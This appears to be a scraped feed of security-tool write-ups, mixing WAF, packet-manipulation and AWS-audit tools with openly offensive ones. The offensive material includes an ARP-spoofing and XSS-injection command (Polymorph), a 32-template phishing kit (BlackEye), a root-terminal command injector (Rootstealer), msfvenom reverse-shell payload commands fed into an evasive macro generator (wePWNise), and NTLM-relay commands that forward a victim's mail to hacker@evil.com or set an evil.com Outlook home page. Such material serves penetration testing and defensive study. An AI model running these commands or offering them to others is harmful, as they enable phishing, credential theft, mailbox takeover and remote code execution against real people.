    $ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt

    Copy vulnerable PHP code to your web server directory
    $ cp doc/test_dfa/test.php /var/www/html

    Now you can test xss attacks at http://localhost:8883/test.php
    Other option to run(now with regex, look file config/regex_rules.txt to edit rules):
    $ bin/Raptor -h 127.0.0.1 -p 80 -r 8883 -w 0 -o resultwaf -m pcre

    Look the docs
    https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

    More: http://funguscodes.blogspot.com/


    Polymorph - A Real-Time Network Packet Manipulation Framework With Support For Almost All Existing Protocols

    $
    0
    0

    Polymorph is a framework written in Python 3 that allows the modification of network packets in real time, providing maximum control to the user over the contents of the packet. This framework is intended to provide an effective solution for real-time modification of network packets that implement practically any existing protocol, including private protocols that do not have a public specification. In addition to this, one of its main objectives is to provide the user with the maximum possible control over the contents of the packet and with the ability to perform complex processing on this information.

    Installation

    Download and installation on Linux
    Polymorph is specially designed to be installed and run on a Linux operating system, such as Kali Linux. Before installing the framework, the following requirements must be installed:
    apt-get install build-essential python-dev libnetfilter-queue-dev tshark tcpdump python3-pip wireshark
    After the installation of the dependencies, the framework itself can be installed with the Python pip package manager in the following way:
    pip3 install polymorph

    Docker environment
    From the project root:
    docker-compose up -d
    To access any of the machines of the environment:
    docker exec -ti [polymorph | alice | bob] bash

    Using Polymorph
    The Polymorph framework is composed of two main interfaces:
    • Polymorph: It consists of a command console interface. It is the main interface and it is recommended to use it for complex tasks such as modifying complex protocols in the air, making modifications of types in fields of the template or modifying protocols without public specification.
    • Phcli: It is the command line interface of the Polymorph framework. It is recommended to use for tasks such as modification of simple protocols or execution of previously generated templates.

    Using the Polymorph main interface
    For examples and documentation please refer to:

    Using the Phcli

    Dissecting almost any network protocol
    Let's start by seeing how Polymorph dissects the fields of different network protocols, it will be useful to refer to them if we want to modify any of this fields in real time. You can try any protocol that comes to your mind.
    • HTTP protocol, show only the HTTP layer and the fields belonging to it.
    # phcli --protocol http --show-fields
    • Show the full HTTP packet and the fields belonging to it.
    # phcli --protocol http --show-packet
    You can also apply filters on network packets, for example, you can indicate that only those containing a certain string or number are displayed.
    # phcli -p dns --show-fields --in-pkt "phrack"
    # phcli -p icmp --show-packet --in-pkt "84" --type "int"
    • You can also concatenate filters.
    # phcli -p http --show-packet --in-pkt "phrack;GET;issues"
    # phcli -p icmp --show-packet --in-pkt "012345;84" --type "str;int"
    • You can filter by the name of the fields that the protocol contains, but bear in mind that this name is the one that Polymorph provides when it dissects the network packet.
    # phcli -p icmp --show-packet --field "chksum"
    • You can also concatenate fields.
    # phcli -p mqtt --show-packet --field "topic;msg"

    Modifying network packets in real time
    Now that we know the Polymorph representation of the network packet that we want to modify, we will see how to modify it in real time.
    Let's start with some examples. All the filters explained during the previous section can also be applied here.
    # phcli -p http --field "request_uri" --value "/issues/61/1.html" --in-pkt "/issues/40/1.html;GET"
    • The previous command will work if we are in the middle of the communication between a machine and the gateway. Probably the user wants to establish himself in the middle, for this he can use arp spoofing.
    # phcli --spoof arp --target 192.168.1.20 --gateway 192.168.1.1 -p http -f "request_uri" -v "/issues/61/1.html" --in-pkt "/issues/40/1.html;GET"
    • Or maybe the user wants to try it on localhost, for that he only has to modify the iptables rule that Polymorph establishes by default.
    # phcli -p http -f "request_uri" -v "/issues/61/1.html" --in-pkt "/issues/40/1.html;GET" -ipt "iptables -A OUTPUT -j NFQUEUE --queue-num 1"
    It may be the case that the user wants to modify a set of bytes of a network packet that have not been interpreted as a field by Polymorph. For this you can directly access the packet bytes using a slice. (Remember to add the iptables rule if you try it in localhost)
    # phcli -p icmp --bytes "50:55" --value "hello" --in-pkt "012345"
    # phcli -p icmp -b "\-6:\-1" --value "hello" --in-pkt "012345"
    # phcli -p tcp -b "\-54:\-20" -v '"><script>alert("hacked")</script>' --in-pkt "</html>"

    Adding complex processing in real time
    In certain situations it is possible that the PHCLI options are not enough to perform a certain action. For this, the framework implements the concept of conditional functions, which are functions written in Python that will be executed on the network packet that is intercepted in real time.
    • The Conditional functions have the following format:
    def precondition(packet):
    # Processing on the packet intercepted in real time
    return packet
    • As a simple example, we are going to screen the raw bytes of the packets that we intercept. (Remember to add the iptables rule if you try it in localhost)
    def execution(packet):
    print(packet.get_payload())
    return None
    # phcli -p icmp --executions execution.py -v "None"
    For more information about the power of the conditional functions, refer to:

    Release Notes
    release-notes-1.0.0
    release-notes-1.0.3

    Contact
    shramos@protonmail.com


    BlackEye - The Most Complete Phishing Tool, With 32 Templates +1 Customizable

    $
    0
    0

    BLACKEYE is an upgrade from original ShellPhish Tool (https://github.com/thelinuxchoice/shellphish) by thelinuxchoice under GNU LICENSE. It is the most complete Phishing Tool, with 32 templates +1 customizable. 
    WARNING: IT ONLY WORKS ON LAN! This tool was made for educational purposes!

    Phishing Pages generated by An0nUD4Y (https://github.com/An0nUD4Y):
    Instagram

    Phishing Pages generated by Social Fish tool (UndeadSec) (https://github.com/UndeadSec/SocialFish):
    Facebook, Google, SnapChat, Twitter, Microsoft

    Phishing Pages generated by @suljot_gjoka (https://github.com/whiteeagle0/blackeye):
    PayPal, eBay, CryptoCurrency, Verizon, DropBox, Adobe ID, Shopify, Messenger, TwitchMyspace, Badoo, VK, Yandex, devianART

    Legal disclaimer:
    Usage of BlackEye for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

    Usage:
    git clone https://github.com/thelinuxchoice/blackeye
    cd blackeye
    bash blackeye.sh


    Rootstealer - X11 Trick To Inject Commands On Root Terminal

    $
    0
    0

    This is simple example of new attack that using X11. Program to detect when linux user opens terminal with root and inject intrusive commands in terminal with X11 lib.

    Video of Proof of concept
    The proposal of this video is use the tool rootstealer to spy all gui windows interactions and inject commands only in root terminal. This approach is util when attacker need to send a malicious program to prove that user is vulnerable to social engineering. Force root command in terminal with lib X11 is a exotic way to show the diversity of weak points.


    Install
    # apt-get install libX11-dev libxtst-dev
    # cd rootstealer/sendkeys;
    Edit file rootstealer/cmd.cfg and write your command to inject.
    Now you can take that following:
    # make; cd ..    #to back to path rootstealer/ 
    # pip intall gi
    or
    # pip install gir
    Run the python script to spy all windows gui and search window with "root@" string in title.
    $ python rootstealer.py &
    Note: If you prefers uses full C code... to use simple binary purposes... you can uses rootstealer.c
    $ sudo apt-get install libwnck-dev
    $ gcc -o rootstealer rootstealer.c `pkg-config --cflags --libs libwnck-1.0` -DWNCK_I_KNOW_THIS_IS_UNSTABLE -DWNCK_COMPILATION
    $ ./rootstealer &
    Done, look the video demo, rootstealer force commands only on root terminal...

    Mitigation
    Don't trust in anyone. https://www.esecurityplanet.com/views/article.php/3908881/9-Best-Defenses-Against-Social-Engineering-Attacks.htm
    Always when you enter by root user, change window title:
    # gnome-terminal --title="SOME TITLE HERE"
    This simple action can prevent this attack.

    Tests
    Tested on Xubuntu 16.04


    Resource-Counter - This Command Line Tool Counts The Number Of Resources In Different Categories Across Amazon Regions

    $
    0
    0

    This command line tool counts the number of resources in different categories across Amazon regions.
    This is a simple Python app that will count resources across different regions and display them on the command line. It first shows the dictionary of the results for the monitored services on a per-region basis, then it shows totals across all regions in a friendlier format. It tries to use the most-efficient query mechanism for each resource in order to manage the impact of API activity. I wrote this to help me scope out assessments and know where resources are in a target account.
    The development plan is to upgrade the output (probably to CSV file) and to continue to add services. If you have a specific service you want to see added just add a request in the comments.

    The current list incluides:
    • Application and Network Load Balancers
    • Autoscale Groups
    • Classic Load Balancers
    • CloudTrail Trails
    • Cloudwatch Rules
    • Config Rules
    • Dynamo Tables
    • Elastic IP Addresses
    • Glacier Vaults
    • IAM Groups
    • Images
    • Instances
    • KMS Keys
    • Lambda Functions
    • Launch Configurations
    • NAT Gateways
    • Network ACLs
    • IAM Policies
    • RDS Instances
    • IAM Roles
    • S3 Buckets
    • SAML Providers
    • SNS Topics
    • Security Groups
    • Snapshots
    • Subnets
    • IAM Users
    • VPC Endpoints
    • VPC Peering Connection
    • VPCs
    • Volumes

    Usage:
    To install just copy it where you want it and instally the requirements:
    pip install -r ./requirements.txt
    This was written in Python 3.6.
    To run:
    python count_resources.py 
    By default, it will use whatever AWScredentials are alerady configued on the system. You can also specify an access key/secret at runtime and this is not stored. It only neeeds read permissions for the listed services- I use the ReadOnlyAccess managed policy, but you should also be able to use the SecurityAudit policy.
    Usage: count_resources.py [OPTIONS]

    Options:
    --access TEXT AWS Access Key. Otherwise will use the standard credentials
    path for the AWS CLI.
    --secret TEXT AWS Secret Key
    --profile TEXT If you have multiple credential profiles, use this option to
    specify one.
    --help Show this message and exit.

    Sample Output:
    Establishing AWS session using the profile- dev Current account ID: xxxxxxxxxx Counting resources across regions. This will take a few minutes...
    Resources by region {'ap-northeast-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-northeast-2': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-south-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-southeast-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-southeast-2': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ca-central-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-central-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-west-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-west-2': {'instances': 3, 'volumes': 3, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-west-3': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'sa-east-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'us-east-1': {'instances': 2, 'volumes': 2, 'security_groups': 19, 'snapshots': 0, 'images': 0, 'vpcs': 2, 'subnets': 3, 'peering connections': 0, 'network ACLs': 2, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 1, 'cloudtrail trails': 2, 'sns topics': 3, 'kms keys': 5, 'dynamo tables': 0, 'rds instances': 0}, 'us-east-2': {'instances': 0, 'volumes': 0, 'security_groups': 2, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'us-west-1': {'instances': 1, 'volumes': 3, 'security_groups': 14, 'snapshots': 1, 'images': 0, 'vpcs': 0, 'subnets': 0, 'peering connections': 0, 'network ACLs': 0, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 1, 'dynamo tables': 0, 'rds instances': 0}, 'us-west-2': {'instances': 9, 'volumes': 29, 'security_groups': 76, 'snapshots': 171, 'images': 104, 'vpcs': 7, 'subnets': 15, 'peering connections': 1, 'network ACLs': 8, 'elastic IPs': 7, 'NAT gateways': 1, 'VPC Endpoints': 0, 'autoscale groups': 1, 'launch configurations': 66, 'classic load balancers': 1, 'application and network load balancers': 2, 'lambdas': 10, 'glacier vaults': 1, 'cloudwatch rules': 8, 'config rules': 1, 'cloudtrail trails': 1, 'sns topics': 6, 'kms keys': 7, 'dynamo tables': 1, 'rds instances': 0}}
    Resource totals across all regions Application and Network Load Balancers : 2 Autoscale Groups : 1 Classic Load Balancers : 1 CloudTrail Trails : 16 Cloudwatch Rules : 8 Config Rules : 2 Dynamo Tables : 1 Elastic IP Addresses : 7 Glacier Vaults : 1 Groups : 12 Images : 104 Instances : 15 KMS Keys : 13 Lambda Functions : 10 Launch Configurations : 66 NAT Gateways : 1 Network ACLs : 22 Policies : 15 RDS Instances : 0 Roles : 40 S3 Buckets : 31 SAML Providers : 1 SNS Topics : 9 Security Groups : 122 Snapshots : 172 Subnets : 51 Users : 14 VPC Endpoints : 0 VPC Peering Connections : 1 VPCs : 21 Volumes : 37
    Total resources: 796


    Aws_Public_Ips - Fetch All Public IP Addresses Tied To Your AWS Account

    $
    0
    0

    aws_public_ips is a tool to fetch all public IP addresses (both IPv4/IPv6) associated with an AWS account.
    It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic & VPC flavors):
    • APIGateway
    • CloudFront
    • EC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch, & NAT Instances)
    • ElasticSearch
    • ELB (Classic ELB)
    • ELBv2 (ALB/NLB)
    • Lightsail
    • RDS
    • Redshift

    If a service isn't listed (S3, ElastiCache, etc) it's most likely because it doesn't have anything to support (i.e. it might not be deployable publicly, it might have all ip addresses resolve to global AWS infrastructure, etc).

    Quick start
    Install the gem and run it:
    $ gem install aws_public_ips

    # Uses default ~/.aws/credentials
    $ aws_public_ips
    52.84.11.13
    52.84.11.83
    2600:9000:2039:ba00:1a:cd27:1440:93a1
    2600:9000:2039:6e00:1a:cd27:1440:93a1

    # With a custom profile
    $ AWS_PROFILE=production aws_public_ips
    52.84.11.159

    CLI reference
    $ aws_public_ips --help
    Usage: aws_public_ips [options]
    -s, --services <s1>,<s2>,<s3> List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all.
    -f, --format <format> Set output format. Available formats: json,prettyjson,text. Defaults to text.
    -v, --[no-]verbose Enable debug/trace output
    --version Print version
    -h, --help Show this help message

    Configuration
    For authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:
    1. Environment variables:
    • AWS_ACCESS_KEY_ID
    • AWS_SECRET_ACCESS_KEY
    • AWS_REGION
    • AWS_PROFILE
    1. Shared credentials files:
    • ~/.aws/credentials
    • ~/.aws/config
    1. Instance profile via metadata endpoint (if running on EC2, ECS, EKS, or Fargate)
    For more information see the AWS SDK documentation on configuration.

    IAM permissions
    To find the public IPs from all AWS services, the minimal policy needed by your IAM user is:
    {
    "Version": "2012-10-17",
    "Statement": [
    {
    "Effect": "Allow",
    "Action": [
    "apigateway:GET",
    "cloudfront:ListDistributions",
    "ec2:DescribeInstances",
    "elasticloadbalancing:DescribeLoadBalancers",
    "lightsail:GetInstances",
    "lightsail:GetLoadBalancers",
    "rds:DescribeDBInstances",
    "redshift:DescribeClusters"
    ],
    "Resource": "*"
    }
    ]
    }

    Contact
    Feel free to tweet or direct message: @arkadiyt


    wePWNise - Generates Architecture Independent VBA Code To Be Used In Office Documents Or Templates And Automates Bypassing Application Control And Exploit Mitigation Software

    $
    0
    0

    wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.

    Prerequisites
    • Python termcolor package. To install run: pip install termcolor

    Command line arguments

    To start using wePWNise, first take a look at the options it supports:
    usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]   
    [--out <output_file>] [--msgbox] [--msg <window_message>]

    optional arguments:
    -h, --help show this help message and exit
    -i86 <x86_shellcode> Input x86 raw shellcode
    -i64 <x64_shellcode> Input x64 raw shellcode
    --inject64 Inject into 64 Bit. Set to False when delivering x86
    payloads only. Default is True
    --out <output_file> File to output the VBA macro to
    --msgbox Present messagebox to prevent automated analysis.
    Default is True.
    --msg <window_message>
    Custom message to present the victim if --msgbox is
    set to True
    wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.
    In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the --msg parameter. To disable this functionality set the --msgbox parameter to False.
    Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.

    Usage examples

    The following sections describe some basic usage examples of wePWNise.

    Metasploit payloads

    First the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.
    $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw
    Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt
    $ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

    Cobalt Strike payloads

    To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.
    Attacks > Packages > Payload Generator
    Enter the generated payloads into wePWNise to generate the VBA code.
    $ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt

    Custom payloads

    In certain cases it may be the case that only an x86 payload be available. As wePWNise expects both a 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the --inject64 parameter to False.
    $ echo "+" > /payloads/dummy64.raw
    $ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt
    Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise's -i86 command line paramenter.


    WAF Buster - Disrupt WAF By Abusing SSL/TLS Ciphers

    $
    0
    0

    Disrupt WAF by abusing SSL/TLS Ciphers

    About WAF_buster
    This tool was created to Analyze the ciphers that are supported by the Web application firewall being used at the web server end. (Reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) It works by first triggering SslScan to look for all the supported ciphers during SSL/TLS negotiation with the web server.After getting the text file of all the supported ciphers, then we use Curl to query web server with each and every Cipher to check which of the ciphers are unsupported by WAF and supported by Web server , if any such Cipher is found then a message is displayed that "Firewall is bypassed".

    Screenshots


    Installation
    git clone https://github.com/viperbluff/WAF_buster.git

    Python2
    This tool has been created using Python2 and below modules have been used throughout:-
    1.requests
    2.os
    3.sys
    4.subprocess

    Usage
    Open terminal
    python2 WAF_buster.py --input




    NtlmRelayToEWS - Ntlm Relay Attack To Exchange Web Services

    $
    0
    0

    ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS). It spawns an SMBListener on port 445 and an HTTPListener on port 80, waiting for incoming connection from the victim. Once the victim connects to one of the listeners, an NTLM negociation occurs and is relayed to the target EWS server.
    Obviously this tool does NOT implement the whole EWS API, so only a handful of services are implemented that can be useful in some attack scenarios. I might be adding more in the future. See the 'usage' section to get an idea of which EWS calls are being implemented.

    Limitations and Improvements
    Exchange version:
    I've tested this tool against an Exchange Server 2010 SP2 only (which is quite old admitedly), so all EWS SOAP request templates, as well as the parsing of the EWS responses, are only tested for this version of Exchange. Although I've not tested myself, some reported this tool is also working against an Exchange 2016 server, out of the box (ie: without any changes to the SOAP request templates).
    In case those SOAP requests wouldn't work on another version of Exchange, it is pretty easy to create the SOAP request templates to match a newer version by using the Microsoft EWS Managed API in trace mode and capture the proper SOAP requests (that's how I did it !).
    EWS SOAP client:
    I would have loved to use a SOAP client in order to get a proper interface for automatically create all SOAP requests based on the Exchange WSDL. I tried using 'zeep' but I banged my head on the wall to get it working with the Exchange WSDL as it requires to download external namespaces and as such requires an internet connection. Also, with 'zeep', the use of a custom transport session requires a Requests.session which is not the type of HTTP(S) session we have by default with the HTTPClientRelay: it would have required either to refactor the HTTPClientRelay to use 'Requests' (/me lazy) or to simply get zeep to create the messages with zeep.client.create_message() and then send it with the relayed session we already have. Or is it because I'm a lame developper ? oh well...

    Prerequisites
    ntlmRelayToEWS requires a proper/clean install of Impacket. So follow their instructions to get a working version of Impacket.

    Usage
    ntlmRelayToEWS implements the following attacks, which are all made on behalf of the relayed user (victim).
    Refer to the help to get additional info: ./ntlmRelayToEWS -h. Get more debug information using the --verbose or -v flag.
    sendMail
    Sends an HTML formed e-mail to a list of destinations:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d "user1@corporate.org,user2@corporate.com" -s Subject -m sampleMsg.html

    getFolder
    Retrieves all items from a predefined folder (inbox, sent items, calendar, tasks):
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inbox

    forwardRule
    Creates an evil forwarding rule that forwards all incoming message for the victim to another email address:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d hacker@evil.com

    setHomePage
    Defines a folder home page (usually for the Inbox folder) by specifying a URL. This technique, uncovered by SensePost/Etienne Stalmans allows for arbitray command execution in the victim's Outlook program by forging a specific HTML page: Outlook Home Page – Another Ruler Vector:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u http://path.to.evil.com/evilpage.html

    addDelegate
    Sets a delegate address on the victim's primary mailbox. In other words, the victim delegates the control of its mailbox to someone else. Once done, it means the delegated address has full control over the victim's mailbox, by simply opening it as an additional mailbox in Outlook:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.org


    How to get the victim to give you their credentials for relaying ?
    In order to get the victim to send his credentials to ntlmRelayToEWS you can use any of the following well known methods:
    • Send the victim an e-mail with a hidden picture which 'src' attribute points to the ntlmRelayToEWS server, using either HTTP or SMB. Check the Invoke-SendEmail.ps1 script to achieve this.
    • Create a link file which 'icon' attribute points to the ntlmRelayToEWS using a UNC path and let victim browse a folder with this link
    • Perform LLMNR, NBNS or WPAD poisonning (think of Responder.py or Invoke-Inveigh for instance) to get any corresponding SMB or HTTP trafic from the victim sent to ntlmRelayToEWS
    • other ?

    Author
    Arno0x0x - @Arno0x0x


    CloudSploit Scans - AWS Security Scanning Checks

    $
    0
    0


    CloudSploit scans is an open-source project designed to allow detection of security risks in an AWS account. These scripts are designed to run against an AWS account and return a series of potential misconfigurations and security risks.

    Installation
    Ensure that NodeJS is installed. If not, install it from here.
    git clone git@github.com:cloudsploit/scans.git
    npm install

    Setup
    To begin using the scanner, edit the index.js file with your AWS key, secret, and optionally (for temporary credentials), a session token. You can also set a file containing credentials. To determine the permissions associated with your credentials, see the permissions section below. In the list of plugins in the exports.js file, comment out any plugins you do not wish to run. You can also skip entire regions by modifying the skipRegions array.
    You can also set the typical environment variables expected by the aws sdks, namely AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN.

    Cross Account Roles
    When using the hosted scanner, you'll need to create a cross-account IAM role. Cross-account roles enable you to share access to your account with another AWS account using the same policy model that you're used to. The advantage is that cross-account roles are much more secure than key-based access, since an attacker who steals a cross-account role ARN still can't make API calls unless they also infiltrate the authorized AWS account.
    To create a cross-account role:
    1. Navigate to the IAM console.
    2. Click "Roles" and then "Create New Role".
    3. Provide a role name (suggested "cloudsploit").
    4. Select the "Role for Cross-Account Access" radio button.
    5. Click the "Select" button next to "Allows IAM users from a 3rd party AWS account to access this account."
    6. Enter 057012691312 for the account ID (this is the ID of CloudSploit's AWS account).
    7. Copy the auto-generated external ID from the CloudSploit web page and paste it into the AWS IAM console textbox.
    8. Ensure that "Require MFA" is not selected.
    9. Click "Next Step".
    10. Select the "Security Audit" policy. Then click "Next Step" again.
    11. Click through to create the role.

    Permissions
    The scans require read-only permissions to your account. This can be done by adding the "Security Audit" AWS managed policy to your IAM user or role.

    Security Audit Managed Policy (Recommended)
    To configure the managed policy:
    1. Open the IAM Console.
    2. Find your user or role.
    3. Click the "Permissions" tab.
